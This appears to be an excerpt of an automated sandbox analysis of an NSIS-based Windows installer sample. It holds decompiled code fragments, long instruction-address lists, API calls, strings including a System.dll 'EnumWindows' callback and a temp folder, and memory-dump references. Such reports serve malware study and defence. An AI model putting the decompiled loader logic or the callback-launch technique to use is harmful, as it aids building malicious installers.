						__eflags =  *__eax;
						goto L403;
					case 0x3e:
						__eax =  *(__esp + 0x34);
						__eax =  *(__esp + 0x34);
						__eflags = __eax;
						if(__eax == 0) {
							__edi = E004068E6(5);
							__eax = E0040303E(__edx, 0x22);
							__eflags = __edi;
							if(__edi == 0) {
								L400:
								0 = 1;
								__eax = 0;
								 *__esi = __ax;
								goto L404;
							}
							__ecx = __esp + 0x50;
							_push(__esp + 0x50);
							_push(__eax);
							__imp__IIDFromString();
							__eflags = __eax;
							if(__eax < 0) {
								goto L400;
							}
							__eax = __esp + 0x18;
							_push(__esp + 0x18);
							_push(0);
							_push( *(__esp + 0x3c));
							__eax = __esp + 0x5c;
							_push(__esp + 0x5c);
							__eax =  *__edi();
							__eflags = __eax;
							if(__eax < 0) {
								goto L400;
							}
							__eax = E00406B1A(__esi,  *(__esp + 0x18));
							_push( *(__esp + 0x18));
							__imp__CoTaskMemFree();
							goto L403;
						}
						__eax = __eax - 1;
						__eflags = __eax;
						if(__eax != 0) {
							goto L403;
						}
						__esi = E00403002(2);
						__eax = E00403002("true");
						__edx = __al & 0x000000ff;
						__eax = __eax >> 0x18;
						__ecx = 0x435ac0;
						__eflags = __esi;
						 *(__esp + 0x18) = 0;
						__ecx =  !=  ? __esi : 0x435ac0;
						__esp + 0x20 = E004066B4(__esp + 0x20, __esp + 0x20, __al & 0x000000ff);
						_push( *(__esp + 0x18));
						_push( *(__esp + 0x18));
						L21:
						__eax = E0040661F();
						goto L403;
					case 0x3f:
						goto L403;
					case 0x40:
						 *0x42bd40 =  *0x42bd40 & 0;
						__eax = SendMessageW(__edx, 0xb,  *0x42bd40 & 0, 0);
						__eflags =  *(__esp + 0x28);
						if( *(__esp + 0x28) != 0) {
							 *(__esp + 0x20) = InvalidateRect( *(__esp + 0x20), 0, 0);
						}
						goto L403;
				}
			}

0x00401565
0x0040156a
0x0040156e
0x0040156e
0x00401570
0x00401574
0x00401579
0x0040158b
0x00401593
0x00401597
0x004015a3
0x004015a6
0x004015aa
0x004015b5
0x004015b9
0x004015bd
0x00402ea1
0x00402ea1
0x00402ea5
0x00402ea5
0x00402eab
0x00000000
0x00402eab
0x004015c7
0x00000000
0x00000000
0x00000000
0x004015d5
0x004015d6
0x00000000
0x00000000
0x004015e6
0x004015ec
0x004015ee
0x004015f1
0x004015f1
0x00000000
0x00000000
0x004015ff
0x00401600
0x00000000
0x00000000
0x0040160c
0x0040160d
0x00000000
0x00000000
0x00401619
0x00401621
0x00401622
0x00401624
0x00401628
0x00000000
0x00000000
0x00401634
0x00000000
0x00000000
0x004016c1
0x004016c7
0x004016cd
0x004016cf
0x004016d3
0x004016d5
0x004016d5
0x004016d9
0x004016de
0x004016e0
0x004016e8
0x004016e8
0x00000000
0x00000000
0x004016f1
0x004016fb
0x00000000
0x00000000
0x00401718
0x0040171b
0x00401720
0x00401724
0x00401726
0x00401728
0x00401784
0x00401784
0x00401789
0x0040178e
0x004017bb
0x00000000
0x00401790
0x00401790
0x0040179d
0x004017a3
0x004017a9
0x004017ab
0x004017b2
0x004017b2
0x00000000
0x004017ab
0x00000000
0x00000000
0x00000000
0x00401741
0x00401741
0x00401745
0x00000000
0x00000000
0x00401747
0x0040174c
0x0040174e
0x00401751
0x0040175e
0x0040175e
0x00401760
0x00401775
0x00401775
0x00401778
0x0040177b
0x0040177e
0x0040172a
0x00401732
0x00401734
0x00401736
0x00401739
0x0040173c
0x0040173f
0x00000000
0x00000000
0x00000000
0x00401780
0x00401780
0x00000000
0x00401780
0x0040177e
0x00401762
0x00401767
0x00401774
0x00401774
0x00401774
0x00000000
0x00401774
0x0040176a
0x00401770
0x00401772
0x00000000
0x00000000
0x00000000
0x00401772
0x00401758
0x00401759
0x00000000
0x00000000
0x004017c3
0x004017c9
0x00000000
0x00000000
0x0040163f
0x00401643
0x00401645
0x00401671
0x00401678
0x00401647
0x00401647
0x00401649
0x00401650
0x00401650
0x0040165f
0x00401661
0x00401665
0x00401665
0x00000000
0x00000000
0x00401684
0x00401688
0x0040168a
0x00401693
0x00401697
0x0040169e
0x004016a0
0x004016a2
0x004016a6
0x00000000
0x00000000
0x004016af
0x00000000
0x00000000
0x004017dc
0x004017e5
0x004017e7
0x004017ee
0x004017f4
0x004017f6
0x00401804
0x00401808
0x00000000
0x00000000
0x0040180f
0x00401814
0x00401816
0x00000000
0x00000000
0x0040181e
0x00401823
0x00401828
0x0040160e
0x0040160e
0x00000000
0x0040160e
0x004017f8
0x004017fd
0x00000000
0x00000000
0x00401835
0x00401837
0x00401843
0x00401849
0x0040184b
0x00401857
0x0040185b
0x0040185d
0x0040187b
0x0040187b
0x0040187f
0x0040187f
0x00401883
0x00401890
0x00401890
0x00000000
0x00401883
0x0040185f
0x00401862
0x00000000
0x00000000
0x00401865
0x0040186a
0x0040186c
0x00000000
0x00000000
0x0040186e
0x00401876
0x00000000
0x00401876
0x0040184d
0x0040184f
0x00401850
0x00401852
0x00000000
0x00000000
0x0040189d
0x004018a2
0x004018b0
0x004018b6
0x004018b8
0x00000000
0x00000000
0x00000000
0x00000000
0x004018cd
0x004018d4
0x00000000
0x00000000
0x004018e0
0x004018e5
0x004018e9
0x004018eb
0x004018ee
0x004018f3
0x004018f7
0x004018fc
0x00401901
0x00401902
0x00401904
0x00401914
0x00401920
0x00401906
0x00401906
0x00401907
0x00401907
0x00401926
0x0040192b
0x0040192d
0x0040192d
0x0040192e
0x0040192e
0x00401931
0x00401934
0x00401939
0x0040193b
0x0040193d
0x0040193f
0x00401943
0x00401943
0x0040194e
0x0040194e
0x00401950
0x00401953
0x00401959
0x0040195b
0x0040195d
0x0040195f
0x0040195f
0x00401960
0x00401960
0x00401964
0x00401966
0x00401969
0x00401969
0x0040196e
0x00401970
0x00401975
0x0040197d
0x00401982
0x00401986
0x00401989
0x00000000
0x00000000
0x0040198f
0x00401991
0x004019fd
0x00401a04
0x00401a09
0x00401a0b
0x00000000
0x00401a0b
0x004019a8
0x004019ad
0x004019b1
0x004019c5
0x004019ce
0x004019d7
0x004019dc
0x004019dc
0x004019df
0x00000000
0x00000000
0x004019e5
0x004019e5
0x004019e8
0x004019f2
0x00000000
0x004019f2
0x004019ea
0x004019eb
0x004015d7
0x004015d7
0x00000000
0x004015d7
0x00401a18
0x00401a1f
0x00401a24
0x00401a28
0x00401a35
0x00401a3a
0x00401a40
0x00401a45
0x00401a49
0x00401a52
0x00401a5a
0x00401a60
0x00401a61
0x00401a67
0x00401a6b
0x00401a6d
0x00000000
0x00000000
0x00401a73
0x00401a76
0x00401a89
0x00401a8b
0x00401a8c
0x00401a78
0x00401a78
0x00401a7a
0x00401a82
0x00401a82
0x00401a91
0x00401a96
0x00000000
0x00401a96
0x00401a4b
0x00401a50
0x00000000
0x00000000
0x00000000
0x00000000
0x00401aa1
0x00000000
0x00000000
0x00401ab8
0x00401ac2
0x00401ac7
0x00401ac9
0x00000000
0x00000000
0x00401acf
0x00401ad3
0x00000000
0x00000000
0x00401ad9
0x00401add
0x00000000
0x00000000
0x00401ae3
0x00000000
0x00000000
0x00401aec
0x00401aa2
0x00401aac
0x00000000
0x00000000
0x00401af2
0x00401af8
0x00000000
0x00000000
0x00401b0c
0x00401b0e
0x00401b19
0x00401b1b
0x00401b21
0x00401b25
0x00401b2a
0x00401b2c
0x00401b2e
0x00401b31
0x00401b34
0x00401b36
0x00000000
0x00000000
0x00401b3c
0x00401b3e
0x00401b48
0x00401b48
0x00401b4a
0x00401b51
0x00401b56
0x00401b5b
0x00401b5d
0x00401b65
0x00401b65
0x00401b65
0x00401b67
0x00401b69
0x00401b6b
0x00401b6e
0x00401b72
0x00401b77
0x00401b7d
0x00401b7f
0x00401b7f
0x00000000
0x00401b77
0x00401b40
0x00401b40
0x00401b42
0x00000000
0x00000000
0x00000000
0x00000000
0x00401b91
0x00401b98
0x00401b99
0x00401b9a
0x00401b9e
0x00401ba8
0x00401ba0
0x00401ba0
0x00401ba0
0x00401bae
0x00401bb0
0x00401c29
0x00401c29
0x00401c2b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00401bbb
0x00401bbd
0x00401bc9
0x00401bcd
0x00401bd3
0x00401bd5
0x00401be9
0x00401be9
0x00401beb
0x00401bed
0x00401bf6
0x00401bf6
0x00401bf6
0x00401bf8
0x00401bfe
0x00401c00
0x00000000
0x00401c00
0x00401bd7
0x00401bdb
0x00401bf2
0x00401bf2
0x00000000
0x00401bf2
0x00401bdf
0x00401be5
0x00401be7
0x00000000
0x00000000
0x00000000
0x00000000
0x00401c04
0x00000000
0x00401c41
0x00401c43
0x00401c4c
0x00401c55
0x00401c57
0x00401c5b
0x00401c5e
0x00401cd0
0x00401cd0
0x00401cd4
0x00401cd6
0x00000000
0x00401cd6
0x00401c60
0x00000000
0x00401c67
0x00000000
0x00000000
0x00401c6b
0x00000000
0x00000000
0x00401c6f
0x00000000
0x00000000
0x00401c74
0x00401c76
0x00000000
0x00000000
0x00401c78
0x00401c7a
0x00401c7b
0x00401c7b
0x00401c7b
0x00401c7d
0x00000000
0x00000000
0x00401c8c
0x00000000
0x00000000
0x00401c90
0x00000000
0x00000000
0x00401c94
0x00000000
0x00000000
0x00401c98
0x00401c9a
0x00401c9c
0x00401c9f
0x00000000
0x00000000
0x00401ca3
0x00401ca5
0x00000000
0x00000000
0x00000000
0x00000000
0x00401caf
0x00401cb1
0x00401cab
0x00401cab
0x00000000
0x00401cab
0x00401cb3
0x00401cb3
0x00401cb5
0x00000000
0x00000000
0x00401ca7
0x00401ca7
0x00000000
0x00000000
0x00401cb9
0x00401cbb
0x00401c81
0x00401c81
0x00401c83
0x00401c83
0x00401c85
0x00401c87
0x00000000
0x00401c87
0x00401cbd
0x00401cbf
0x00401cc0
0x00401cc0
0x00401cc0
0x00401cc2
0x00000000
0x00000000
0x00401cc6
0x00000000
0x00000000
0x00401cca
0x00000000
0x00000000
0x00401cce
0x00000000
0x00000000
0x00000000
0x00401ce9
0x00401cf3
0x00401cf9
0x00000000
0x00000000
0x00401d01
0x00401d05
0x00401d0b
0x00401d0d
0x00401d63
0x00401d65
0x00401d93
0x00401d99
0x00401d9d
0x00401d9f
0x00401da2
0x00401da3
0x00401da8
0x00401dad
0x00401daf
0x00000000
0x00401daf
0x00401d67
0x00401d69
0x00000000
0x00000000
0x00401d74
0x00401d79
0x00401d7c
0x00401d81
0x00000000
0x00000000
0x00000000
0x00000000
0x00401d0f
0x00401d0f
0x00401d0f
0x00401d10
0x00401d12
0x00000000
0x00000000
0x00401d14
0x00401d16
0x00401d18
0x00000000
0x00000000
0x00401d1a
0x00401d1c
0x00000000
0x00000000
0x00401d1e
0x00401d21
0x00401d28
0x00401d2d
0x00401d37
0x00401d3c
0x00401d41
0x00401d42
0x00401d42
0x00401d45
0x00000000
0x00401d45
0x00000000
0x00000000
0x00401dc1
0x00401dc5
0x00401dce
0x00401dd0
0x00401dd6
0x00401dd8
0x00401de1
0x00401de3
0x00401de7
0x00401de7
0x00401deb
0x00401ded
0x00401df6
0x00401df6
0x00401df8
0x00401dfd
0x00401dff
0x00401e57
0x00401e59
0x00401e5e
0x00401e60
0x00401e67
0x00401e69
0x00401e6c
0x00401e75
0x00000000
0x00401e01
0x00401e08
0x00401e0c
0x00401e13
0x00401e17
0x00401e1a
0x00401e1c
0x00401e48
0x00401e7b
0x00401e7b
0x00401e7f
0x00401e7f
0x00401e83
0x00000000
0x00000000
0x00000000
0x00401e89
0x00401e1e
0x00401e32
0x00401e34
0x00401e36
0x00401e3b
0x00000000
0x00401e3b
0x00000000
0x00401e8f
0x00401e96
0x00401e9c
0x00401e9c
0x00401e9e
0x00401bb2
0x00401bb2
0x00000000
0x00401bb2
0x00401ea4
0x00000000
0x00000000
0x00401eb6
0x00401eb8
0x00401ec1
0x00000000
0x00000000
0x00401ecc
0x00401ed3
0x00401edf
0x00000000
0x00000000
0x00401eea
0x00401ef2
0x00401ef3
0x00000000
0x00401fc1
0x00401fce
0x00401fd0
0x00401fd8
0x00401fe0
0x00401feb
0x00401ff3
0x00401ff9
0x00401ffd
0x00402001
0x00402008
0x0040200a
0x00402011
0x00402016
0x00402018
0x0040201a
0x0040201d
0x00402022
0x00402027
0x0040202d
0x00402037
0x0040203d
0x00402041
0x00402042
0x00000000
0x00000000
0x00402050
0x00402059
0x0040205a
0x0040205b
0x0040205f
0x0040206c
0x00402061
0x00402061
0x00402061
0x00000000
0x00000000
0x0040207f
0x00402088
0x00402091
0x0040209f
0x004020a4
0x004020a8
0x004020ac
0x004020b0
0x004020b2
0x004020b6
0x004020ba
0x004020be
0x004020c1
0x004020c5
0x004020c8
0x004020cc
0x004020ce
0x004020d1
0x004020d9
0x004020dc
0x004020e0
0x004020e5
0x004020ea
0x004020ec
0x00000000
0x00000000
0x004020f2
0x004020f7
0x00000000
0x00000000
0x00402104
0x00402110
0x00000000
0x00000000
0x00402121
0x00402126
0x0040212c
0x00402131
0x00402135
0x00402137
0x00402139
0x00000000
0x00000000
0x0040213f
0x00402143
0x00402146
0x0040214b
0x0040214f
0x0040215f
0x00402160
0x00402165
0x00402151
0x00402156
0x00402156
0x0040214f
0x00402110
0x00000000
0x00000000
0x0040216e
0x00402179
0x0040217b
0x0040217d
0x00402190
0x00402192
0x00402195
0x00000000
0x00402195
0x00402183
0x00402188
0x00000000
0x00000000
0x0040219f
0x004021a4
0x004021a8
0x004021ac
0x004021ad
0x004021b0
0x004021b5
0x004021b7
0x004021b9
0x004021bd
0x004021bf
0x004021c2
0x004021c3
0x004021c6
0x004021c8
0x004021d1
0x004021d7
0x004021db
0x004021dd
0x004021ec
0x004021ee
0x004021f3
0x004021f7
0x004021fb
0x004021ff
0x00402200
0x00402204
0x00402206
0x00402208
0x0040220a
0x0040220e
0x0040220f
0x00402213
0x00402214
0x00402219
0x0040221d
0x00402221
0x00402223
0x00402225
0x00402232
0x00402237
0x00402247
0x0040224c
0x0040224c
0x00402223
0x00402252
0x00402252
0x004021dd
0x00000000
0x00000000
0x0040225d
0x0040225f
0x00402260
0x00402262
0x00402268
0x0040233e
0x00402343
0x00000000
0x00402343
0x00402275
0x00402278
0x00402281
0x00402285
0x00402289
0x0040229c
0x004022a0
0x004022a6
0x004022a8
0x004022aa
0x00402335
0x0040233a
0x00000000
0x0040233a
0x004022b0
0x004022ba
0x004022bc
0x004022c0
0x004022c2
0x0040230c
0x004022c4
0x004022c4
0x004022c6
0x004022ca
0x004022e6
0x004022ea
0x004022ef
0x004022f4
0x004022f9
0x004022fe
0x004022ff
0x00402301
0x004022cc
0x004022d5
0x004022da
0x004022de
0x004022e0
0x004022e2
0x004022e2
0x004022e0
0x004022ca
0x00402311
0x00402315
0x0040231c
0x00402321
0x00402323
0x0040232a
0x0040232a
0x00402323
0x00000000
0x00402315
0x0040228c
0x00402292
0x00402294
0x00402296
0x00000000
0x00000000
0x00402298
0x00000000
0x00000000
0x00402358
0x0040235c
0x00402361
0x00402365
0x00402370
0x0040237b
0x00402384
0x00402388
0x0040238e
0x00402394
0x00402396
0x0040239a
0x0040239c
0x004023a2
0x004023a5
0x004023a9
0x004023ad
0x004023b0
0x004023b4
0x004023b9
0x004023bb
0x004023bf
0x004023bf
0x004023c4
0x004023c8
0x004023ca
0x004023cb
0x004023d0
0x004023d1
0x004023d2
0x004023d3
0x004023d8
0x004023de
0x004023e0
0x004023e2
0x004023e8
0x004023ec
0x004023f0
0x004023f1
0x004023f6
0x004023f7
0x004023fb
0x004023fd
0x004023ff
0x00402405
0x00402409
0x0040240d
0x0040240e
0x00402413
0x00402415
0x00402419
0x0040241b
0x0040241f
0x00402424
0x00402425
0x00402427
0x00402427
0x0040242a
0x0040242c
0x0040242e
0x00402432
0x00402433
0x00402434
0x00402436
0x00402436
0x00402439
0x0040243d
0x00402441
0x00402442
0x00402444
0x00402447
0x0040244b
0x0040244e
0x00402450
0x00402454
0x00402458
0x00402459
0x0040245b
0x0040245c
0x0040245c
0x0040245f
0x00402463
0x00402467
0x00402468
0x0040246a
0x0040246d
0x00402471
0x00402475
0x00402476
0x00402478
0x0040247b
0x0040247d
0x0040247f
0x00402483
0x00402484
0x00402488
0x0040248a
0x0040248e
0x0040248e
0x00402490
0x00402494
0x00402495
0x00402497
0x00402497
0x0040249a
0x0040249e
0x0040249f
0x004024a1
0x004024a1
0x004024a6
0x004024b1
0x004024b5
0x004024ba
0x00000000
0x00000000
0x004024ca
0x004024d3
0x004024db
0x004024dd
0x004024e2
0x004024e4
0x004024f3
0x004024f8
0x004024fc
0x00402504
0x00402509
0x0040250c
0x00402511
0x00402516
0x0040251a
0x0040251f
0x00402524
0x00402528
0x0040252c
0x00402530
0x0040253a
0x0040253f
0x00402545
0x00402547
0x00000000
0x00000000
0x0040254d
0x004024e9
0x00000000
0x00000000
0x0040254f
0x00402555
0x00401d50
0x00401d50
0x00401d55
0x00401d57
0x00401d5d
0x00401a97
0x00401a97
0x004015dc
0x004015dc
0x00000000
0x004015dc
0x0040255b
0x00000000
0x00000000
0x00402566
0x00402568
0x0040256a
0x0040256c
0x00402574
0x00402576
0x00402576
0x0040257a
0x0040257c
0x00402585
0x00402585
0x00402587
0x0040258b
0x00402594
0x00402594
0x00402598
0x004025a1
0x00401701
0x00401701
0x00401703
0x00000000
0x00000000
0x00000000
0x00000000
0x004025ac
0x004025ae
0x004025b6
0x004025bf
0x004025c8
0x004025ca
0x004025cf
0x004025e1
0x004025e7
0x004025e9
0x004025ea
0x004025ee
0x00000000
0x00000000
0x004025f4
0x004025f6
0x00000000
0x00000000
0x004025ff
0x00402601
0x00402602
0x00402606
0x00402631
0x0040263a
0x0040263d
0x00402648
0x00402608
0x0040260a
0x0040260f
0x00402611
0x00402613
0x00402617
0x00402625
0x00402627
0x00402627
0x00402613
0x0040264a
0x0040264c
0x0040264e
0x00000000
0x00000000
0x00402656
0x0040265a
0x0040265e
0x00402664
0x0040266f
0x00402673
0x00402678
0x00402689
0x0040268a
0x0040268c
0x00402692
0x00402697
0x0040269b
0x0040269d
0x0040269f
0x004026a2
0x004026a6
0x004026a8
0x00000000
0x00000000
0x004026ae
0x004026b2
0x004026b7
0x004026b9
0x004026d1
0x004026d3
0x004026d4
0x004026d6
0x004026e7
0x004026e9
0x004026ec
0x004026fe
0x004026fe
0x004026d8
0x004026e0
0x004026e0
0x004026bb
0x004026bd
0x004026c8
0x004026c8
0x00402701
0x00402710
0x00402716
0x00402718
0x0040271a
0x00000000
0x00000000
0x0040272d
0x00402734
0x00402736
0x0040273b
0x0040273d
0x00402740
0x00402742
0x00000000
0x00000000
0x00402748
0x0040274c
0x00402756
0x0040275e
0x00402764
0x00402766
0x00402767
0x00402769
0x004027a4
0x004027a4
0x004027a6
0x004027a8
0x0040271c
0x0040271d
0x00000000
0x0040271d
0x0040276b
0x00402770
0x00402790
0x00402792
0x00402797
0x0040279a
0x00000000
0x0040279a
0x00402772
0x00402776
0x0040277f
0x0040277f
0x00402783
0x00402785
0x00000000
0x00402785
0x00402778
0x0040277d
0x00000000
0x00000000
0x00000000
0x00000000
0x004027b5
0x004027bc
0x004027be
0x004027c3
0x004027c8
0x004027ca
0x004027cd
0x004027cf
0x00000000
0x00000000
0x004027d5
0x004027da
0x004027de
0x004027e2
0x004027f4
0x004027fc
0x00402804
0x00402805
0x0040280a
0x004027e4
0x004027e8
0x004027e8
0x0040280e
0x00402811
0x00402818
0x00000000
0x00000000
0x00402824
0x00402829
0x0040282b
0x00000000
0x00000000
0x00402110
0x00402110
0x00000000
0x00000000
0x00402839
0x00402847
0x0040284c
0x0040284f
0x00401afd
0x00401afd
0x004016b6
0x004016b6
0x00000000
0x004016b6
0x00000000
0x00000000
0x0040285f
0x00402863
0x00402865
0x00402869
0x0040286c
0x00402870
0x00402875
0x0040287a
0x0040287b
0x0040287f
0x00402881
0x00402899
0x0040289c
0x004028c5
0x004028cb
0x004028d2
0x0040289e
0x004028b0
0x004028bf
0x004028bf
0x00402883
0x00402884
0x0040288d
0x0040288f
0x00402896
0x00402896
0x004028d4
0x004028d7
0x00000000
0x004028dd
0x004028e3
0x004028e9
0x004028e9
0x004028ed
0x00402904
0x0040290b
0x00402910
0x00402912
0x00000000
0x00000000
0x00000000
0x00402918
0x004028ef
0x004028f3
0x00000000
0x00000000
0x004028f7
0x004028fc
0x004028fe
0x00000000
0x00000000
0x00000000
0x004028fe
0x00000000
0x0040291d
0x0040291f
0x00402921
0x00402925
0x00402929
0x0040292e
0x00402930
0x00402932
0x00402934
0x00000000
0x00000000
0x0040293a
0x0040293f
0x00402944
0x00402948
0x0040294b
0x00402aa2
0x00402aa2
0x00402aa6
0x00402aa8
0x00402aaa
0x00402aac
0x00401a10
0x00401a10
0x00000000
0x00401a10
0x00402952
0x0040295b
0x0040295d
0x00402961
0x00402965
0x00000000
0x00000000
0x0040296b
0x00402973
0x00402975
0x00402975
0x0040297a
0x00402a33
0x00402a37
0x00402a4c
0x00402a4e
0x00402a54
0x00402a59
0x00402a5b
0x00000000
0x00000000
0x00402a5d
0x00402a5d
0x00402a61
0x00402a65
0x00402a65
0x00402a69
0x00402ae4
0x00402ae9
0x00000000
0x00402ae9
0x00402a6b
0x00402a6d
0x00402a6e
0x00402a73
0x00402a75
0x00402a76
0x00402ab5
0x00402ab5
0x00402aba
0x00402ad3
0x00402adc
0x00000000
0x00402adc
0x00402abc
0x00402ac1
0x00402ac8
0x00402ac8
0x00402acc
0x00402acc
0x00402acd
0x00402ad0
0x00402ad2
0x00000000
0x00402ad2
0x00402ac3
0x00402ac6
0x00000000
0x00000000
0x00000000
0x00402ac6
0x00402a78
0x00402a7d
0x00000000
0x00000000
0x00402a7f
0x00402a83
0x00402a84
0x00402a87
0x00402a8b
0x00402a8f
0x00402a92
0x00000000
0x00000000
0x00000000
0x00402a92
0x00402a39
0x00402a3b
0x00000000
0x00000000
0x00402a3f
0x00402a44
0x00402a46
0x00000000
0x00000000
0x00402a48
0x00000000
0x00402a48
0x00402980
0x00402981
0x00402985
0x00402986
0x00402988
0x0040298e
0x00402994
0x0040299a
0x0040299c
0x00000000
0x00000000
0x004029a2
0x004029a6
0x004029aa
0x004029ac
0x00000000
0x00000000
0x004029b2
0x004029b7
0x004029bb
0x004029bf
0x00000000
0x00000000
0x004029cc
0x004029d4
0x004029da
0x004029dc
0x00000000
0x00000000
0x004029de
0x004029e2
0x004029e4
0x004029e6
0x004029e6
0x004029e6
0x004029e6
0x004029eb
0x004029f0
0x004029f4
0x00000000
0x00000000
0x004029f7
0x004029f8
0x004029ff
0x00402a03
0x00402a0e
0x00402a17
0x00402a1f
0x00402a25
0x00402a29
0x00402a2d
0x00402a2f
0x00000000
0x00000000
0x00000000
0x00402a31
0x00000000
0x00402a94
0x00402a94
0x00402a98
0x00402a98
0x00000000
0x00000000
0x00402af3
0x00402af6
0x00000000
0x00000000
0x00402afe
0x00402b0b
0x00402b11
0x00402b17
0x00402b1b
0x00000000
0x00000000
0x00000000
0x00000000
0x00402b29
0x00402b2e
0x00402b30
0x00402b37
0x00402b37
0x00000000
0x00000000
0x00402b43
0x00402b48
0x00402b4a
0x004018be
0x004018c0
0x004018c1
0x004018c3
0x00000000
0x004018c3
0x00402b50
0x00402b59
0x00402b5f
0x00402b61
0x00000000
0x00000000
0x00000000
0x00000000
0x00402b77
0x00402b7c
0x00402b85
0x00402b8b
0x00402b8e
0x00402b9c
0x00402b67
0x00402b67
0x00402b6e
0x00402b6f
0x00401d46
0x00401d46
0x00000000
0x00401d46
0x00402b90
0x00402b92
0x00402855
0x00402855
0x00402857
0x00000000
0x00000000
0x00402ba5
0x00402bb2
0x00402bb5
0x00402bb9
0x00402bbe
0x00402bc0
0x00402bc4
0x00402bc4
0x00402bca
0x00402bcf
0x00402bd1
0x00402bd5
0x00402bd6
0x00402bdc
0x00402bde
0x00402be2
0x00402be5
0x00402cb7
0x00402cb7
0x00402cb9
0x00402cba
0x00402cbe
0x00402ccf
0x00402cc0
0x00402cc0
0x00402cc2
0x00402cc4
0x00402ccc
0x00402ccc
0x00402cd3
0x00402cd8
0x00402345
0x00402345
0x00000000
0x00402beb
0x00402beb
0x00402bef
0x00402bf3
0x00402bf7
0x00402ca3
0x00402cad
0x00402cb1
0x00000000
0x00402cb1
0x00402bfd
0x00402c05
0x00402c0f
0x00402c11
0x00402c15
0x00402c17
0x00402c9f
0x00000000
0x00402c9f
0x00402c28
0x00402c39
0x00402c3b
0x00402c3f
0x00402c41
0x00402c84
0x00402c88
0x00402c8e
0x00402c9a
0x00000000
0x00402c9a
0x00402c4d
0x00402c52
0x00402c55
0x00402c7a
0x00402c7e
0x00000000
0x00402c7e
0x00402c57
0x00402c59
0x00402c59
0x00402c5b
0x00402c5e
0x00402c66
0x00402c6b
0x00402c6d
0x00402c6d
0x00402c72
0x00402c76
0x00000000
0x00402c76
0x00000000
0x00402cdf
0x00402ce4
0x00402ce7
0x00402ced
0x00402cef
0x00402cf0
0x00000000
0x00000000
0x00402d6f
0x00402d72
0x00402d75
0x00401709
0x0040170b
0x00000000
0x0040170b
0x00402d7b
0x00402d7f
0x00402da4
0x00402da9
0x00402dad
0x00402dbf
0x00402dc6
0x00402dc7
0x00402daf
0x00402daf
0x00402db3
0x00402db3
0x00000000
0x00402dad
0x00402d81
0x00402d85
0x00402d9a
0x00402d9c
0x00402d9e
0x00402da2
0x00402b21
0x00402b21
0x00402b22
0x00000000
0x00402b22
0x00402d88
0x00402d8f
0x00402d90
0x00402d91
0x00402d93
0x00402d95
0x00402d97
0x00402d97
0x00000000
0x00000000
0x00402dd1
0x00402dd5
0x00402dd5
0x00402dd7
0x00402e2c
0x00402e2e
0x00402e33
0x00402e35
0x00402e72
0x00402e74
0x00402e75
0x00402e77
0x00000000
0x00402e77
0x00402e37
0x00402e3b
0x00402e3c
0x00402e3d
0x00402e43
0x00402e45
0x00000000
0x00000000
0x00402e47
0x00402e4b
0x00402e4c
0x00402e4d
0x00402e51
0x00402e55
0x00402e56
0x00402e58
0x00402e5a
0x00000000
0x00000000
0x00402e61
0x00402e66
0x00402e6a
0x00000000
0x00402e6a
0x00402dd9
0x00402dd9
0x00402ddc
0x00000000
0x00000000
0x00402deb
0x00402ded
0x00402df3
0x00402df7
0x00402dfa
0x00402dff
0x00402e01
0x00402e06
0x00402e11
0x00402e16
0x00402e1a
0x004016b7
0x004016b7
0x00000000
0x00000000
0x00000000
0x00000000
0x00402e82
0x00402e88
0x00402e8e
0x00402e92
0x00402e9b
0x00402e9b
0x00000000
0x00000000

APIs

PostQuitMessage.USER32(00000000), ref: 004015F1
Sleep.KERNEL32(00000001,?,00000000,00000000), ref: 00401628
SetForegroundWindow.USER32 ref: 00401634
ShowWindow.USER32(?,00000000,?,?,00000000,00000000), ref: 004016D3
ShowWindow.USER32(?,?,?,?,00000000,00000000), ref: 004016E8
SetFileAttributesW.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 004016FB
GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?,?,00000000,00000000), ref: 0040176A
SetCurrentDirectoryW.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\mnstring,00000000,000000E6,C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll), ref: 004017A3
MoveFileW.KERNEL32(00000000,00000000), ref: 004017EE
GetFullPathNameW.KERNEL32(00000000,00000400,00000000,?,00000000,000000E3,C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll,?,?,00000000,00000000), ref: 00401843
GetShortPathNameW.KERNEL32(00000000,00000000,00000400), ref: 00401890
SearchPathW.KERNEL32(00000000,00000000,00000000,00000400,00000000,?,000000FF,?,?,00000000,00000000), ref: 004018B0
lstrcatW.KERNEL32(00000000,00000000), ref: 00401920
CompareFileTime.KERNEL32(-00000014,00000000,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\mnstring,00000000,00000000,00000031,00000000,00000000,000000EF), ref: 00401948
SetFileTime.KERNELBASE(00000000,000000FF,00000000,000000FF,?,00000000,00000000,00000000,000000EA,00000000,Call,40000000,00000001,Call,00000000), ref: 00401A5A
CloseHandle.KERNELBASE(00000000), ref: 00401A61
lstrcatW.KERNEL32(Call,00000000), ref: 00401A82

Strings

C:\Users\user\AppData\Local\Temp\mnstring, xrefs: 00401798, 0040190E
user32::EnumWindows(i r1 ,i 0), xrefs: 00401574, 00401993, 004019A3, 004019C0
C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll, xrefs: 00401789, 004017F8, 00401823, 004019B1, 004019D2
C:\Users\user\AppData\Local\Temp\nsb12B3.tmp, xrefs: 00401998, 004019BB
Call, xrefs: 004018FC, 00401906, 00401913, 00401925, 00401933, 00401968, 0040197C, 004019A2, 004019EA, 00401A7A, 00401A81, 00401A8B, 00401A96

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
